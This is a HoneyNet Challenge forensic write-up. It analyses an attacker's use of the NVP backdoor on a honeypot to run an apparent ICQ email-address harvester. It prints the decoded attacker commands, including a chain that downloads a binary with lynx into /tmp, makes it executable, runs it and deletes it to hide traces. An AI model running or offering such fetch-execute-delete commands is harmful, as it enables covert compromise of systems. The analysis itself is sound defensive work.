HoneyNet Challenge Analysis

Scan 22 – August 2002

Analysis by Kevin Peuhkurinen
August 12, 2002

The Challenge

After penetrating the Linux system using the WU-FTPD vulnerability, the attacker deployed a backdoor binary and then proceeded to use the system for certain nefarious activity. Your mission, should you choose to accept it, is to determine what the activity was and how it was accomplished. All the necessary evidence is contained in the snort binary capture file. The IP address of the honeypot is

Preliminary Steps

As the basis of this attack was the backdoor binary that was the subject of the Reverse Challenge from May 2002, the first step was to read some of the analyses from that Challenge. Of particular value to me was the advisory written by (CoPS) Lab at the University of North Texas, and located here:

To summarize, the backdoor binary listens for IP packets which have the protocol number set to 11.  As these packets arrive statelessly, the source IP address can be spoofed.  These packets have a type number, which is either 2 for command or 3 for reply. The rest of the packets are trivially encoded to hide their contents.  Having loaded the Snort log in Ethereal, I could see these packets, beginning at # 7.

In order to read the packets easily, I downloaded and used Dion Mendel's Perl script from the Reverse Challenge. It is located here:

I quickly (okay, it took a few minutes of head scratching) found a small typo in the script; on lines 59 and 87 the second $data[4]object should read $data[5]. After making the necessary change, I re-ran the script on the Snort log and studied the output: -> (handler -> agent)
Initialise agent.
All replies are sent to handler at
(plus 9 other randomly generated hosts)
---------------------------------------------------------------- -> (handler -> agent)
Execute the given command and send output to handler:
grep -i "zone" /etc/named.conf
---------------------------------------------------------------- -> (agent -> handler)
output of command executed by agent:
zone "." {
zone "0.0.127.in-addr.arpa" {

(Snipped out the redundant packets going to bogus IP addresses) -> (agent -> handler)
end of output of command executed by agent
---------------------------------------------------------------- -> (handler -> agent)
Execute the given command, do not send output to handler:
killall -9 ttserve
---------------------------------------------------------------- -> (handler -> agent)
Execute the given command, do not send output to handler:
killall -9 ttserve
---------------------------------------------------------------- -> (handler -> agent)
Execute the given command, do not send output to handler:
killall -9 ttserve ; lynx -source > /tmp/ttserve ; chmod 755 /tmp/ttserve ; cd /tmp ; ./ttserve ; rm -rf /tmp/ttserve ./ttserve ;
---------------------------------------------------------------- -> (handler -> agent)
Execute the given command, do not send output to handler:
killall -9 lynx ; rm -rf /tmp/ttserve;
---------------------------------------------------------------- -> (handler -> agent)
Execute the given command, do not send output to handler:
killall -9 lynx ; rm -rf /tmp/ttserve;
---------------------------------------------------------------- -> (handler -> agent)
Execute the given command, do not send output to handler:
killall -9 lynx ; rm -rf /tmp/ttserve;

I must admit that following this, I spent about six hours becoming more and more baffled.  I was working under the assumption that 'foo' was an IRC bot. This assumption was given to me first by The Honeynet Project itself,here.

The assumption was backed up when I started doing Google searches for some of the text that I found in 'foo' and the searches kept coming back with links to an IRC bot named “Puaj”.

Part of the problem I had with this is that I never use IRC. I briefly played around with multi-user BBSs back in the 1980's and since then have always felt that in terms of useful or even entertaining ways of spending time, electronic chat ranks well below scrubbing mildew from the cracks between my bathroom tiles.  Hence I did not even really know what an IRC bot was.

So, after spending some time reading about the many varied uses of IRC bots, I was unable to reconcile what I had learned with the behaviour of 'foo', which simply appeared to be requesting the home pages of IRC users.   Also, I was still wondering why an IRC hacker would care about the DNS zones hosted by the system (the first command our hacker sent to the NVP Trojan). It was only then when I was beginning to seriously doubt my original assumption that I noticed something odd about the behaviour of 'foo' that gave me a new idea about what the attacker's purpose might be.

I will elaborate on this in the answers section, but I have finally come to the conclusion that this attacker is a spammer or is working for spammers.


1. What is the attacker's IP Address?

This one is simple: It was sent to the NVP Trojan in the first packet. According to WHOIS, the attacking machine is located in New Zealand.

2. What is the attacker doing first? What do you think is his/her motivation for doing this?

The first thing the attacker does after initializing the trojan is to tell it to run the command:
grep -i "zone" /etc/named.conf
and send the output back to the attacker. If this system was operating as a DNS server, this command would list all of the zone names it served. Spammers are interested in enumerating domain names in order to find new places to send their unsolicited emails.

3. Why there is some readable text in packets #17-#25 (and some others), but not in packets #15-#16 (and several others)? What differentiates these groups of packets from each other?

Actually, all of the response packets from the victim have some readable text in them; part of the command executed by the trojan and part of the response. This is due to sloppy coding on the part of the programmer who created the NVP Trojan. To understand why this is happening, I looked at Dion Mendel's source code for the reverse engineered binary.

If you are unfamiliar with C, this section may be confusing to you. If so, I apologize. I considered putting in a paragraph trying to describe how string buffer pointers work but figured that I would probably just end up make it more confusing.

At line 2,211 the code constructs a command string and stores it at a memory location pointed to by 'buffer' (using the dangerous sprintf() function which means that, ironically, the trojan may be vulnerable to buffer overflow attacks!). So, in our attack, we now have a string in memory that reads:
/bin/csh -f -c “grep -i “zone” /etc/named.conf" 1> /tmp/.hj237349 2>&1

This command is then sent to the system to be executed. Then, at line 2,219 we read up to the first 398 bytes of the result of the command to the same memory location. The memory that 'buffer' points to now looks like this:
zone “.” { zone “0.0.127.in-addr.arpa” { .conf" 1> /tmp/.hj237349 2>&1

Two lines later, the trojan copies the output part of this and sends it to the encode function with the result being placed in a new string at 'output_buffer'.

So far so good, but the programmer decided that she wanted each response packet to be a random size. What she does is tells the transmit function to start sending the contents of memory starting at the 'output_buffer' pointer and to send 400 bytes plus an extra random number of bytes between one and two hundred. The programmer no doubt assumed that those extra bytes would look like garbage. Well, as I pointed out in my Preliminary Steps section, assumptions can be dangerous. In this case when the program was allocating memory for the strings, it must have given 'buffer' the memory that directly followed that given to 'output_buffer'. You can literally see the results:

In the first response packet (which is sent out 10 times – once to the handler and again to nine random IP addresses), the data section is 512 bytes which means 400 bytes of encoded (and also padded) data plus 112 bytes from the 'buffer' memory. This includes all of the text shown above plus some garbage.

In the second response packet, the data section is 463 bytes; 400 of encoded and padded data and 63 bytes of the text above. Counting it now, I see that I am off by a bit (okay, a bunch of bits), which means that there is probably a few bytes allocated to a integer between the two strings, but the theory still works.

Hence, the programmer has managed to do exactly what they meant to avoid; transmit suspicious looking traffic.

4. What is the purpose of 'foo'? Can you provide more insights about the internal workings of 'foo'? Do you think that 'foo' was coded by a good programmer or by an amateur?

The observed behaviour of foo is thus:

  1. Look up the IP address of web.icq.com
  2. Open an HTTP connection to the IP address using a source port starting at 1026 and incrementing by one each loop.
  3. Send GET /wwp?Uin=xxxxxxxx HTTP/1.0 Host:web.icq.com where xxxxxxxx is a number starting at 9207102 and incrementing by one each loop.
  4. Accept a number of packets in response, usually about 10-14.
  5. Send the GET request again. I think this is a bug.
  6. Close the TCP connection.
  7. Start over at step 1.

What finally clued me in the idea that the attacker is a spammer is step 4 above. Why, I wondered, didn't 'foo' wait for the full response from the icq.com server? Why was it closing the connection half-way through the web page download? It took me a while but I finally realized that the last packet that 'foo' accepted was the packet that contained the ICQ user's email address. It could be coincidence but I can think of no other explanation for this behaviour: 'foo' is a tool of evil -- a real-life email address harvester.

With the exception of the HTTP GET command, the only readable text in 'foo' is from various pre-existing code such as gethostbyname and yplibc. This leads me to believe that the actual code was obfuscated either as source or during compiling to object code. Still, I can make a few observations about 'foo'. The first is that it contains its own DNS resolver, although it uses the locally configured DNS server name. Probably this is to ensure that it can use DNS even if the local system is not set up to do so, and it likely has a DNS server address to fall back on if it cannot find one in resolv.conf.

More interesting is the inclusion of the Network Information Service (formerly YP) library 'yplibc'. Obviously an email harvester is useless if you cannot retrieve the email addresses it has found. My guess here is that 'foo' is opening an RPC listener process bound to a TCP or UDP port via which the attacker can request the list of email addresses found. This would eliminate the need for the original exploit and would ensure that no suspicious log files are left behind – which is something that the attacker seems concerned about (more on that later).

Finally on the question of the skill of the programmer, I have very little information on which to base an opinion but I would have to say that he or she is closer to amateur than to expert. My reasons for saying so are:

  1. 'foo' does a DNS lookup for web.icq.com every loop. This just seems lazy, as though the programmer couldn't be bothered to put in the code to check every 100 loops which would have sped the program up.
  2. The program sends the HTTP GET command a second time just before closing the TCP connection. This must be a bug.
  3. A good programmer would have created a multi-threaded application to request several pages at once.
  4. A capable programmer who was concerned about fully hiding their purpose would not have linked in code that contained human readable text.

5. What is the purpose of './ttserve ; rm -rf /tmp/ttserve' as done by the attacker?

The full command line sent by the attacker is:

killall -9 ttserve ; lynx -source > /tmp/ttserve ; chmod 755 /tmp/ttserve ; cd /tmp ; ./ttserve ; rm -rf /tmp/ttserve ./ttserve ;

What the attacker is doing here is:

  1. Killing any process that might be running as 'ttserve'
  2. Downloading 'foo' to /tmp as 'ttserve'
  3. Making 'ttserve' executable
  4. Changing the current working directory to /tmp
  5. Launching 'ttserve'
  6. Deleting 'ttserve' from the disk

So the purpose of this part of the command is to execute the program then delete it from the disk so that it leaves no easily discernible traces. The attacker is obviously very concerned about this as he or she repeats the rm command three more times.

6. How do you think the attacker will use the results of his activity involving 'foo'?

If my belief is correct and 'foo' is an email address harvester, the attacker will use the results of 'foo' to sent unsolicited commercial email to the poor ICQ users whose email addresses are on display on their generated web pages. The other possibility is that the attacker is not a spammer him or herself but is in the business of selling email addresses to spammers.

Either way, the hapless ICQ users can look forward to seeing their in-boxes fill up with mail inviting them to hot teen sex sites, offering cheap viagara alternatives, and pleadings to help the daughters of former Nigerian dictators.

7. If you administer a network, would you have caught such NVP backdoor communication? If yes, how? If you do not administer a network, what do you think is the best way to prevent such communication from happening and/or detect it?

As a network administrator, I would never have a firewall so badly misconfigured that it allowed packets in or out with the IP protocol field set to 11. Additionally, I would have been alerted to the attempt by my Snort IDS which would have logged the packets as “Bad Traffic: Non-Standard IP Protocol”, which I would certainly have investigated further.